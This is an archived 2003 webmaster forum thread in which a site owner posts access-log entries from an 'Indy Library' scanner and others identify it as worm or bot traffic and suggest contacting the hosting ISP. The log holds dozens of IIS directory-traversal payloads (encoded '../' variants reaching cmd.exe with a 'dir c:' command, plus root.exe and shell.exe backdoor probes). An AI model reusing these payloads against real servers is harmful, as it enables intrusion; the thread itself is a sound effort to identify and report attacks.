homepage Welcome to WebmasterWorld Guest from 50.16.112.199
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

    
Indy Library - Chinese Spambot?
strange entries in my log file
bashyam

10+ Year Member



 
Msg#: 1864 posted 6:19 am on Apr 21, 2003 (gmt 0)

Hi,

I found these unrelated entries in my logs frequetly... could anyone let me know what it is?
------------------------------------------------------------
24.226.39.127 - - [21/Apr/2003:00:48:07 -0400] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:09 -0400] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:11 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:12 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:13 -0400] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:14 -0400] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:15 -0400] "GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:18 -0400] "GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:19 -0400] "GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:22 -0400] "GET /iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:23 -0400] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:24 -0400] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:25 -0400] "GET /msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:28 -0400] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:30 -0400] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:31 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:32 -0400] "GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:33 -0400] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:34 -0400] "GET /msdac/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:35 -0400] "GET /msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:36 -0400] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:37 -0400] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:46 -0400] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:47 -0400] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:48 -0400] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:50 -0400] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:51 -0400] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:52 -0400] "GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:53 -0400] "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:54 -0400] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:55 -0400] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:56 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:57 -0400] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:00 -0400] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:06 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:11 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:12 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:13 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:14 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:16 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:17 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:18 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
------------------------------------------------------------

Thanks..

Balaji.

 

jrobbio

10+ Year Member



 
Msg#: 1864 posted 6:42 am on Apr 21, 2003 (gmt 0)

Its a Chinese spam bot. Please be more selective with the category you choose for your posts. This is the Google section.

kwngian

10+ Year Member



 
Msg#: 1864 posted 8:15 am on Apr 21, 2003 (gmt 0)

>Its a Chinese spam bot.

It is a "compromised" spam bot.

The IP address says its canadian.

Even the spammers have their day for having an unpatch windows machine.

[edited by: kwngian at 10:26 am (utc) on April 21, 2003]

bashyam

10+ Year Member



 
Msg#: 1864 posted 8:51 am on Apr 21, 2003 (gmt 0)

Thanks for your reply.

Also, sorry to post this at Google section... by mistake I did that.

Balaji.

sullen

10+ Year Member



 
Msg#: 1864 posted 9:12 am on Apr 21, 2003 (gmt 0)

don't know where the chinese spam bot idea came from - it's a machine infected with the Code red / Nimda worm.

You can't block it. The best thing to do is look up the ip address to find out which company hosts the machine and then write to them.

bull

10+ Year Member



 
Msg#: 1864 posted 9:57 am on Apr 21, 2003 (gmt 0)

24.226.39.127 is not chinese:
Cogeco Cable Inc. COGECOWAVE-1 (NET-24-226-0-0-1)
24.226.0.0 - 24.226.127.255

Apart from this, Indy Library is a candidate blocked by many here: [webmasterworld.com...]

jan

jrobbio

10+ Year Member



 
Msg#: 1864 posted 10:13 am on Apr 21, 2003 (gmt 0)
The Chinese bot thing came from a site and I quote:
[quote]Originally, the Indy Library is a programming library which is available at http://www.nevrona.com/Indy or http://indy.torry.net under an Open Source license. This library is included with Borland Delphi 6, 7, C++Builder 6, plus all of the Kylix versions. Unfortunately, this library is hi-jacked and abused by some Chinese spam bots. All recent user-agents with the unmodified "Indy Library" string were of Chinese origin.[/quote]
sullen

10+ Year Member



 
Msg#: 1864 posted 12:03 pm on Apr 21, 2003 (gmt 0)

righty - missed the "Indy Library" part - I was just going on the addresses its trying to hit.

I would say contact the host is still the best advice though.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved